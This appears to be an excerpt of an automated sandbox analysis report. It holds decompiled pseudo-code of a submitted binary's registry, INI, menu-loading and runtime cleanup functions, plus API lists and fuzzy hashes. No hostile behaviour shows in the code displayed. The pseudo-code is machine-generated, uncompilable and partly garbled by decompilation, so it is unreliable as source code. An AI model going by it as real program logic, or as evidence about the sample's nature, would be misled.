      				long _t129;
      				unsigned int* _t131;
      				signed int* _t132;
      				void* _t133;
      				void* _t142;
      				void* _t154;
      				void* _t168;
      				signed int _t169;
      				char** _t172;
      				char* _t173;
      				void* _t174;
      				char* _t177;
      				void* _t179;
      				void* _t181;
      				signed int _t184;
      				signed int _t186;
      
      				_push(0x10);
      				E00AAD232(0xac82e7, __ebx, __edi, __esi);
      				_t172 = _a16;
      				_t131 = _a20;
      				_t177 = 0;
      				 *_t172 = 0;
      				 *_t131 = 0;
      				_push(0);
      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
      					_push(_a12);
      					_push(_a8);
      					_t167 =  &_a12;
      					_push( &_a12);
      					 *((intOrPtr*)( *__ecx + 0x84))();
      					_t140 = _a12;
      					_t83 =  *(_a12 - 0xc);
      					_v4 = 1;
      					__eflags = _t83;
      					if(__eflags != 0) {
      						_a20 = _t83;
      						 *_t131 = _t83 >> 1;
      						_t85 = E009A6291(__eflags, _t83 >> 1);
      						_t142 = 0;
      						 *_t172 = _t85;
      						__eflags = _a20;
      						if(_a20 <= 0) {
      							L16:
      							E009A5510( &(_a12[0xfffffffffffffff0]), _t167);
      							_t88 = 1;
      							__eflags = 1;
      							goto L17;
      						} else {
      							while(1) {
      								_t31 = _t142 + 1; // 0x1
      								_t168 = _t31;
      								__eflags = _t168 - _t177;
      								if(_t168 < _t177) {
      									break;
      								}
      								_t118 = _a12;
      								_t131 =  *(_t118 - 0xc);
      								__eflags = _t168 - _t131;
      								if(_t168 > _t131) {
      									break;
      								} else {
      									__eflags = _t142 - _t177;
      									if(_t142 < _t177) {
      										break;
      									} else {
      										__eflags = _t142 - _t131;
      										if(_t142 > _t131) {
      											break;
      										} else {
      											asm("cdq");
      											_t167 =  *_t172;
      											_t131 = ( *((intOrPtr*)(_t168 + _t118)) - 1 << 4) +  *((intOrPtr*)(_t142 + _t118)) - 0x41;
      											_t121 = _t142 - _t168 >> 1;
      											_t142 = _t142 + 2;
      											( *_t172)[_t121] = _t131;
      											__eflags = _t142 - _a20;
      											if(_t142 < _a20) {
      												continue;
      											} else {
      												goto L16;
      											}
      										}
      									}
      								}
      								goto L32;
      							}
      							E009A54F0(_t131, _t142, _t168, _t172, _t177, 0x80070057);
      							asm("int3");
      							_t184 = _t186;
      							_push(0xffffffff);
      							_push(0xac830d);
      							_push( *[fs:0x0]);
      							E00AAB480(0x1020);
      							_t94 =  *0xd0c910; // 0x3a0e8b0c
      							_t95 = _t94 ^ _t184;
      							_v44 = _t95;
      							_push(_t131);
      							_push(_t177);
      							_push(_t172);
      							_push(_t95);
      							 *[fs:0x0] =  &_v40;
      							_t173 = _v12;
      							_t169 = _v8;
      							_t132 = _v20;
      							_t97 = _v16;
      							_v4168 = _t173;
      							_v4144 = _t169;
      							_v4156 = 0;
      							__eflags =  *(_t142 + 0x58);
      							if( *(_t142 + 0x58) == 0) {
      								__eflags = _t169;
      								if(__eflags == 0) {
      									_v4124 = 0xad8d30;
      								}
      								GetPrivateProfileStringA(_t97, _t173, _v4124,  &_v4120, 0x1000,  *(_t142 + 0x6c));
      								_push( &_v4120);
      								goto L30;
      							} else {
      								_t103 = E009B33F8(_t142, _t97, 0); // executed
      								_v4132 = _t103;
      								__eflags = _t103;
      								if(__eflags != 0) {
      									E009A5D70( &_v4128, _t169, E009B9D52());
      									_t175 = RegQueryValueExA;
      									_v12 = 0;
      									_v4144 = 0;
      									_v4140 = 0;
      									_t108 = RegQueryValueExA(_v4132, _t173, 0,  &_v4144, 0,  &_v4140); // executed
      									_v4136 = _t108;
      									__eflags = _t108;
      									if(_t108 == 0) {
      										_v4136 = RegQueryValueExA(_v4132, _v4148, 0,  &_v4144, E009A5F20(_t132,  &_v4128, _t169, RegQueryValueExA, _v4140),  &_v4140);
      										E009A876D(_t132,  &_v4128, RegQueryValueExA, 0xffffffff);
      									}
      									RegCloseKey(_v4132);
      									__eflags = _v4136;
      									if(__eflags != 0) {
      										_push(_v4124);
      										E009AFB60(_t132, _t132, _t169, _t175, 0, __eflags);
      										_t154 = _v4128 + 0xfffffff0;
      									} else {
      										_t181 = _v4128 + 0xfffffff0;
      										_t113 = E009A6C6C(_t181) + 0x10;
      										__eflags = _t113;
      										 *_t132 = _t113;
      										_t154 = _t181;
      									}
      									E009A5510(_t154, _t169);
      								} else {
      									_push(_v4124);
      									L30:
      									E009AFB60(_t132, _t132, _t169, _t173, 0, __eflags);
      								}
      							}
      							 *[fs:0x0] = _v20;
      							_pop(_t174);
      							_pop(_t179);
      							_pop(_t133);
      							__eflags = _v24 ^ _t184;
      							return E00AAB46A(_t132, _t133, _v24 ^ _t184, _t169, _t174, _t179);
      						}
      					} else {
      						E009A5510(_t140 + 0xfffffff0,  &_a12);
      						goto L2;
      					}
      				} else {
      					_push(_a8);
      					_t123 = E009B33F8(__ecx);
      					_v16 = _t123;
      					if(_t123 != 0) {
      						_v28 = _t123;
      						_v24 = 0;
      						_v20 = 0;
      						_v4 = 0;
      						_a16 = 0;
      						_a8 = 0;
      						_t124 = RegQueryValueExA(_t123, _a12, 0,  &_a16, 0,  &_a8);
      						_t162 = _a8;
      						 *_a20 = _a8;
      						__eflags = _t124;
      						if(__eflags != 0) {
      							L7:
      							_push( *_t172);
      							E009A62C0();
      							 *_t172 = _t177;
      						} else {
      							_t127 = E009A6291(__eflags, _t162);
      							 *_t172 = _t127;
      							_t129 = RegQueryValueExA(_v16, _a12, 0,  &_a16, _t127,  &_a8);
      							__eflags = _t129;
      							if(_t129 != 0) {
      								goto L7;
      							} else {
      								_t177 = 1;
      								__eflags = 1;
      							}
      						}
      						E009B3320( &_v28);
      						_t88 = _t177;
      					} else {
      						L2:
      						_t88 = 0;
      					}
      					L17:
      					return E00AAD30A(_t88);
      				}
      				L32:
      			}

      APIs
      • __EH_prolog3.LIBCMT ref: 009B3696
      • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,00000000,?,00000010), ref: 009B36ED
      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009B3714
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,3A0E8B0C,?,00000000,?,00000000,00AC830D,000000FF,?,80070057), ref: 009B3891
      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,80070057), ref: 009B38CA
      • RegCloseKey.ADVAPI32(?,?,80070057), ref: 009B38E5
      • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 009B394E
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: QueryValue$CloseH_prolog3PrivateProfileString_malloc
      • String ID:
      • API String ID: 900355960-0
      • Opcode ID: 8034db9eb7aa5b18f55ab00991f9fd47a5ae1690379b78ebc18267a12ae0e8f9
      • Instruction ID: fd54424fa081e334798358b402292362779a4ca1cb3f4145066efbc0c51b112c
      • Opcode Fuzzy Hash: 8034db9eb7aa5b18f55ab00991f9fd47a5ae1690379b78ebc18267a12ae0e8f9
      • Instruction Fuzzy Hash: 7691C4B1900168EFCB21DF64CD84ADEBBB8FF49720F108599F55997291DB749A80CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      APIs
      • RegOpenKeyExA.KERNELBASE(80000001,software,00000000,0002001F,?), ref: 009B3378
      • RegCreateKeyExA.KERNELBASE(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 009B33A3
      • RegCreateKeyExA.KERNELBASE(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 009B33CE
      • RegCloseKey.KERNELBASE(?), ref: 009B33E2
      • RegCloseKey.ADVAPI32(?), ref: 009B33EC
        • Part of subcall function 009B3262: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B3274
        • Part of subcall function 009B3262: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 009B3284
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseCreate$AddressHandleModuleOpenProc
      • String ID: software
      • API String ID: 550756860-2010147023
      • Opcode ID: 6a06592c754586ba682067207f5cd8c03b65d3681f0cd5c79f3f792c1145df9a
      • Instruction ID: bbeeff53ae8e59714c27a726a8e8e1bb127cd95074a669932fcddf9289a8f735
      • Opcode Fuzzy Hash: 6a06592c754586ba682067207f5cd8c03b65d3681f0cd5c79f3f792c1145df9a
      • Instruction Fuzzy Hash: D2211831900158FB8B21DB9ACE84CEFBFBEEFC5720B64805AF506A2010DB325B41DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 24%
      			E00AACA9C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t36;
      				intOrPtr* _t40;
      				intOrPtr _t45;
      				intOrPtr _t47;
      				intOrPtr* _t53;
      				intOrPtr* _t55;
      				void* _t56;
      				void* _t58;
      
      				_push(0x20);
      				_push(0xb19418);
      				E00AAD340(__ebx, __edi, __esi);
      				E00AB5091(__ebx, __edi, 8);
      				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
      				_t58 =  *0xd136d8 - 1; // 0x1
      				if(_t58 != 0) {
      					 *0xd136d4 = 1;
      					_t34 =  *((intOrPtr*)(_t56 + 0x10));
      					 *0xd136d0 =  *((intOrPtr*)(_t56 + 0x10));
      					if( *((intOrPtr*)(_t56 + 0xc)) == 0) {
      						_t55 = __imp__DecodePointer; // executed
      						_t34 =  *_t55( *0xd146f4); // executed
      						_t45 = 1;
      						 *((intOrPtr*)(_t56 - 0x30)) = 1;
      						if(1 != 0) {
      							_t34 =  *_t55( *0xd146f0);
      							_t53 = 1;
      							 *((intOrPtr*)(_t56 - 0x2c)) = 1;
      							 *((intOrPtr*)(_t56 - 0x24)) = 1;
      							 *((intOrPtr*)(_t56 - 0x28)) = 1;
      							while(1) {
      								_t53 = _t53 - 4;
      								 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
      								if(_t53 < _t45) {
      									goto L11;
      								}
      								if( *_t53 == _t34) {
      									continue;
      								} else {
      									if(_t53 >= _t45) {
      										_t40 =  *_t55( *_t53);
      										 *_t53 = E00AB4097(_t40);
      										 *_t40();
      										_t47 =  *_t55( *0xd146f4);
      										_t34 =  *_t55( *0xd146f0);
      										if( *((intOrPtr*)(_t56 - 0x24)) != _t47 ||  *((intOrPtr*)(_t56 - 0x28)) != _t34) {
      											 *((intOrPtr*)(_t56 - 0x24)) = _t47;
      											 *((intOrPtr*)(_t56 - 0x30)) = _t47;
      											 *((intOrPtr*)(_t56 - 0x28)) = _t34;
      											_t53 = _t34;
      											 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
      										}
      										_t45 =  *((intOrPtr*)(_t56 - 0x30));
      										continue;
      									}
      								}
      								goto L11;
      							}
      						}
      						L11:
      						 *((intOrPtr*)(_t56 - 0x1c)) = 0xad6da4;
      						while( *((intOrPtr*)(_t56 - 0x1c)) < 0xad6db0) {
      							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x1c))));
      							if(_t34 != 0) {
      								_t34 =  *_t34();
      							}
      							 *((intOrPtr*)(_t56 - 0x1c)) =  *((intOrPtr*)(_t56 - 0x1c)) + 4;
      						}
      					}
      					 *((intOrPtr*)(_t56 - 0x20)) = 0xad6db4;
      					while( *((intOrPtr*)(_t56 - 0x20)) < 0xad6db8) {
      						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x20))));
      						if(_t34 != 0) {
      							_t34 =  *_t34();
      						}
      						 *((intOrPtr*)(_t56 - 0x20)) =  *((intOrPtr*)(_t56 - 0x20)) + 4;
      					}
      				}
      				 *(_t56 - 4) = 0xfffffffe;
      				L23();
      				if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
      					return E00AAD385(_t34);
      				} else {
      					 *0xd136d8 = 1;
      					_t36 = E00AB4FB8(8);
      					E00AAC984( *((intOrPtr*)(_t56 + 8))); // executed
      					if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
      						return E00AB4FB8(8);
      					}
      					return _t36;
      				}
      			}

      0x00aaca9c
      0x00aaca9e
      0x00aacaa3
      0x00aacaaa
      0x00aacab0
      0x00aacab7
      0x00aacabd
      0x00aacac3
      0x00aacac8
      0x00aacacb
      0x00aacad4
      0x00aacae0
      0x00aacae6
      0x00aacae8
      0x00aacaea
      0x00aacaef
      0x00aacaf7
      0x00aacaf9
      0x00aacafb
      0x00aacafe
      0x00aacb01
      0x00aacb04
      0x00aacb04
      0x00aacb07
      0x00aacb0c
      0x00000000
      0x00000000
      0x00aacb15
      0x00000000
      0x00aacb17
      0x00aacb19
      0x00aacb1d
      0x00aacb26
      0x00aacb28
      0x00aacb32
      0x00aacb3a
      0x00aacb3f
      0x00aacb46
      0x00aacb49
      0x00aacb4c
      0x00aacb4f
      0x00aacb51
      0x00aacb51
      0x00aacb54
      0x00000000
      0x00aacb54
      0x00aacb19
      0x00000000
      0x00aacb15
      0x00aacb04
      0x00aacb59
      0x00aacb59
      0x00aacb60
      0x00aacb6c
      0x00aacb70
      0x00aacb72
      0x00aacb72
      0x00aacb74
      0x00aacb74
      0x00aacb60
      0x00aacb7a
      0x00aacb81
      0x00aacb8d
      0x00aacb91
      0x00aacb93
      0x00aacb93
      0x00aacb95
      0x00aacb95
      0x00aacb81
      0x00aacb9b
      0x00aacba2
      0x00aacbab
      0x00aacbdb
      0x00aacbad
      0x00aacbad
      0x00aacbb9
      0x00aacbc2
      0x00aacbcb
      0x00000000
      0x00aacbd4
      0x00aacbd5
      0x00aacbd5

      APIs
      • __lock.LIBCMT ref: 00AACAAA
        • Part of subcall function 00AB5091: __mtinitlocknum.LIBCMT ref: 00AB50A7
        • Part of subcall function 00AB5091: __amsg_exit.LIBCMT ref: 00AB50B3
        • Part of subcall function 00AB5091: EnterCriticalSection.KERNEL32(00000000,00000000,?,00AB41A1,0000000D), ref: 00AB50BB
      • RtlDecodePointer.NTDLL(00B19418,00000020,00AACC03,00000000,00000001,00000000,?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACAE6
      • DecodePointer.KERNEL32(?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACAF7
        • Part of subcall function 00AB4097: RtlEncodePointer.NTDLL(00000000,00AC0492,00D13BB8,00000314,00000000,?,?,?,?,?,00AB674F,00D13BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00AB4099
      • DecodePointer.KERNEL32(-00000004,?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACB1D
      • DecodePointer.KERNEL32(?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACB30
      • DecodePointer.KERNEL32(?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACB3A
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
      • String ID:
      • API String ID: 2005412495-0
      • Opcode ID: a4c5bec624cffbe609057b78f7ab2a13729bcb17f24b73213788e3d590bd80ca
      • Instruction ID: 84582111113a6e81620642ef1a0e7f368b1e72e626d37bf39bb39633b3cf75d2
      • Opcode Fuzzy Hash: a4c5bec624cffbe609057b78f7ab2a13729bcb17f24b73213788e3d590bd80ca
      • Instruction Fuzzy Hash: BB311870900309EFEF509FA9D9866DCBBF4BF5A320F10402AE451A7291CB764945CF75
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 548 9c9bdb-9c9bf2 549 9c9bfc-9c9c0c 548->549 550 9c9bf4-9c9bf7 call 9a9079 548->550 552 9c9c0e-9c9c12 549->552 553 9c9c37-9c9c3b 549->553 550->549 552->553 554 9c9c14-9c9c34 call 9bd77f LoadMenuW LoadAcceleratorsW 552->554 555 9c9c3d-9c9c41 553->555 556 9c9c66-9c9c6a 553->556 554->553 555->556 557 9c9c43-9c9c63 call 9bd77f LoadMenuW LoadAcceleratorsW 555->557 558 9c9c6c-9c9c70 556->558 559 9c9c95-9c9c99 556->559 557->556 558->559 562 9c9c72-9c9c92 call 9bd77f LoadMenuW LoadAcceleratorsW 558->562 562->559
      C-Code - Quality: 96%
      			E009C9BDB(void* __ecx) {
      				struct HINSTANCE__* _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				struct HACCEL__* _t31;
      				struct HINSTANCE__* _t33;
      				struct HINSTANCE__* _t37;
      				struct HINSTANCE__* _t41;
      				void* _t56;
      
      				_push(__ecx);
      				_t56 = __ecx;
      				_t48 = __ecx + 0x84;
      				_t31 =  *(__ecx + 0x84);
      				if( *((intOrPtr*)(_t31 - 0xc)) == 0) {
      					_t31 = E009A9079(_t48,  *((intOrPtr*)(__ecx + 0x54))); // executed
      				}
      				_t53 = LoadMenuW;
      				_t45 = LoadAcceleratorsW;
      				if( *(_t56 + 0x5c) != 0) {
      					_t60 =  *((intOrPtr*)(_t56 + 0x44));
      					if( *((intOrPtr*)(_t56 + 0x44)) == 0) {
      						_t41 =  *(E009BD77F(LoadAcceleratorsW, LoadMenuW, _t56, _t60) + 0xc);
      						_v8 = _t41;
      						 *((intOrPtr*)(_t56 + 0x44)) = LoadMenuW(_t41,  *(_t56 + 0x5c) & 0x0000ffff);
      						_t31 = LoadAcceleratorsW(_v8,  *(_t56 + 0x5c) & 0x0000ffff);
      						 *(_t56 + 0x48) = _t31;
      					}
      				}
      				if( *(_t56 + 0x58) != 0) {
      					_t62 =  *((intOrPtr*)(_t56 + 0x4c));
      					if( *((intOrPtr*)(_t56 + 0x4c)) == 0) {
      						_t37 =  *(E009BD77F(_t45, _t53, _t56, _t62) + 0xc);
      						_v8 = _t37;
      						 *((intOrPtr*)(_t56 + 0x4c)) = LoadMenuW(_t37,  *(_t56 + 0x58) & 0x0000ffff);
      						_t31 = LoadAcceleratorsW(_v8,  *(_t56 + 0x58) & 0x0000ffff);
      						 *(_t56 + 0x50) = _t31;
      					}
      				}
      				if( *(_t56 + 0x60) != 0) {
      					_t64 =  *((intOrPtr*)(_t56 + 0x3c));
      					if( *((intOrPtr*)(_t56 + 0x3c)) == 0) {
      						_t33 =  *(E009BD77F(_t45, _t53, _t56, _t64) + 0xc);
      						_v8 = _t33;
      						 *((intOrPtr*)(_t56 + 0x3c)) = LoadMenuW(_t33,  *(_t56 + 0x60) & 0x0000ffff);
      						_t31 = LoadAcceleratorsW(_v8,  *(_t56 + 0x60) & 0x0000ffff);
      						 *(_t56 + 0x40) = _t31;
      					}
      				}
      				return _t31;
      			}

      0x009c9be0
      0x009c9be3
      0x009c9be5
      0x009c9beb
      0x009c9bf2
      0x009c9bf7
      0x009c9bf7
      0x009c9c00
      0x009c9c06
      0x009c9c0c
      0x009c9c0e
      0x009c9c12
      0x009c9c1d
      0x009c9c22
      0x009c9c27
      0x009c9c32
      0x009c9c34
      0x009c9c34
      0x009c9c12
      0x009c9c3b
      0x009c9c3d
      0x009c9c41
      0x009c9c4c
      0x009c9c51
      0x009c9c56
      0x009c9c61
      0x009c9c63
      0x009c9c63
      0x009c9c41
      0x009c9c6a
      0x009c9c6c
      0x009c9c70
      0x009c9c7b
      0x009c9c80
      0x009c9c85
      0x009c9c90
      0x009c9c92
      0x009c9c92
      0x009c9c70
      0x009c9c99

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Load$AcceleratorsMenu
      • String ID:
      • API String ID: 144087665-0
      • Opcode ID: d79af0f82b0c3d72095cb21f49074eabfb9a8e84dee19a0dae017af41a02e27c
      • Instruction ID: 98d2c70c1e7adad742af7ef33dd7b8c2450cddf95ddcaf52d56f5902af64e2c1
      • Opcode Fuzzy Hash: d79af0f82b0c3d72095cb21f49074eabfb9a8e84dee19a0dae017af41a02e27c
      • Instruction Fuzzy Hash: B121EDB5801714EFD730DBAAC949BAAF7F8FF48315F10481EE58682560E7B5A940DF11
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 71%
      			E009B1645(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr* _t22;
      				intOrPtr _t28;
      				intOrPtr* _t35;
      				void* _t36;
      
      				_push(4);
      				E00AAD232(0xac8206, __ebx, __edi, __esi);
      				_t35 = __ecx;
      				 *((intOrPtr*)(_t36 - 0x10)) = 0;
      				E009B15E1(__ecx, 0x20, _t36 - 0x10);
      				if( *((intOrPtr*)(_t36 + 8)) != 0) {
      					_t39 =  *((intOrPtr*)(_t36 - 0x10));
      					if( *((intOrPtr*)(_t36 - 0x10)) == 0) {
      						_t28 = E009A6291(_t39, 0x20);
      						 *((intOrPtr*)(_t36 - 0x10)) = _t28;
      						 *(_t36 - 4) = 0;
      						_t40 = _t28;
      						if(_t28 == 0) {
      							_t22 = 0;
      							__eflags = 0;
      						} else {
      							_push(0x1e);
      							_push( *((intOrPtr*)(_t36 + 8)));
      							_push("File%d");
      							_push("Recent File List");
      							_push(0);
      							_t22 = E009C3F8C(__ebx, _t28, __edx, 0, _t35, _t40);
      						}
      						 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
      						 *((intOrPtr*)(_t35 + 0x8c)) = _t22;
      						 *((intOrPtr*)( *_t22 + 0x14))();
      					}
      				}
      				 *((intOrPtr*)(_t35 + 0x9c)) =  *((intOrPtr*)( *_t35 + 0x7c))("Settings", "PreviewPages", 0);
      				return E00AAD30A(_t19);
      			}

      0x009b1645
      0x009b164c
      0x009b1651
      0x009b165b
      0x009b165e
      0x009b1666
      0x009b1668
      0x009b166b
      0x009b1675
      0x009b1677
      0x009b167a
      0x009b167d
      0x009b167f
      0x009b1698
      0x009b1698
      0x009b1681
      0x009b1681
      0x009b1683
      0x009b1686
      0x009b168b
      0x009b1690
      0x009b1691
      0x009b1691
      0x009b169a
      0x009b169e
      0x009b16a8
      0x009b16a8
      0x009b166b
      0x009b16bd
      0x009b16c8

      APIs
      • __EH_prolog3.LIBCMT ref: 009B164C
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
        • Part of subcall function 009C3F8C: __EH_prolog3.LIBCMT ref: 009C3F93
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3$_malloc
      • String ID: File%d$PreviewPages$Recent File List$Settings
      • API String ID: 1683881009-526586445
      • Opcode ID: 0db9a58a1685fa540b639f7e2f8fbe33d313ae6a531560aa24972615c660d26e
      • Instruction ID: a1a5a2c346ed5d443026b2d96310bd514d1a0d1ff8a49ef01d27aeb594908e38
      • Opcode Fuzzy Hash: 0db9a58a1685fa540b639f7e2f8fbe33d313ae6a531560aa24972615c660d26e
      • Instruction Fuzzy Hash: E7019270A40304EBCB14EFB08915FAE77B5BF85710F10491EF566A7281CB708500DF51
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E009A2150() {
      				intOrPtr _v8;
      				char _v16;
      				intOrPtr _v20;
      				void* __ecx;
      				signed int _t15;
      				void* _t23;
      				intOrPtr _t28;
      				intOrPtr _t36;
      				signed int _t38;
      				void* _t39;
      				void* _t40;
      
      				_push(0xffffffff);
      				_push(0xac77d4);
      				_push( *[fs:0x0]);
      				_push(_t28);
      				_t15 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t15 ^ _t38);
      				 *[fs:0x0] =  &_v16;
      				_t36 = _t28;
      				_v20 = _t36;
      				_v8 = 4;
      				E00AC5C96(_t36); // executed
      				_t19 =  *((intOrPtr*)(_t36 + 0x1c));
      				_t40 = _t39 + 4;
      				if( *((intOrPtr*)(_t36 + 0x1c)) != 0) {
      					E00AAB4AB(_t19);
      					_t40 = _t40 + 4;
      				}
      				 *((intOrPtr*)(_t36 + 0x1c)) = 0;
      				_t20 =  *((intOrPtr*)(_t36 + 0x14));
      				if( *((intOrPtr*)(_t36 + 0x14)) != 0) {
      					E00AAB4AB(_t20);
      					_t40 = _t40 + 4;
      				}
      				 *((intOrPtr*)(_t36 + 0x14)) = 0;
      				_t21 =  *((intOrPtr*)(_t36 + 0xc));
      				if( *((intOrPtr*)(_t36 + 0xc)) != 0) {
      					E00AAB4AB(_t21);
      					_t40 = _t40 + 4;
      				}
      				 *((intOrPtr*)(_t36 + 0xc)) = 0;
      				_t22 =  *((intOrPtr*)(_t36 + 4));
      				if( *((intOrPtr*)(_t36 + 4)) != 0) {
      					E00AAB4AB(_t22);
      				}
      				 *((intOrPtr*)(_t36 + 4)) = 0;
      				_v8 = 0xffffffff;
      				_t23 = E00AC5B15(_t36);
      				 *[fs:0x0] = _v16;
      				return _t23;
      			}

      0x009a2153
      0x009a2155
      0x009a2160
      0x009a2161
      0x009a2164
      0x009a216b
      0x009a216f
      0x009a2175
      0x009a2177
      0x009a217b
      0x009a2182
      0x009a2187
      0x009a218c
      0x009a2191
      0x009a2194
      0x009a2199
      0x009a2199
      0x009a219c
      0x009a219f
      0x009a21a4
      0x009a21a7
      0x009a21ac
      0x009a21ac
      0x009a21af
      0x009a21b2
      0x009a21b7
      0x009a21ba
      0x009a21bf
      0x009a21bf
      0x009a21c2
      0x009a21c5
      0x009a21ca
      0x009a21cd
      0x009a21d2
      0x009a21d7
      0x009a21da
      0x009a21e1
      0x009a21e9
      0x009a21f6

      APIs
      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009A2182
        • Part of subcall function 00AC5C96: _setlocale.LIBCMT ref: 00AC5CA8
      • _free.LIBCMT ref: 009A2194
        • Part of subcall function 00AAB4AB: HeapFree.KERNEL32(00000000,00000000,?,00AAAEFC,?), ref: 00AAB4C1
        • Part of subcall function 00AAB4AB: GetLastError.KERNEL32(?,?,00AAAEFC,?), ref: 00AAB4D3
      • _free.LIBCMT ref: 009A21A7
      • _free.LIBCMT ref: 009A21BA
      • _free.LIBCMT ref: 009A21CD
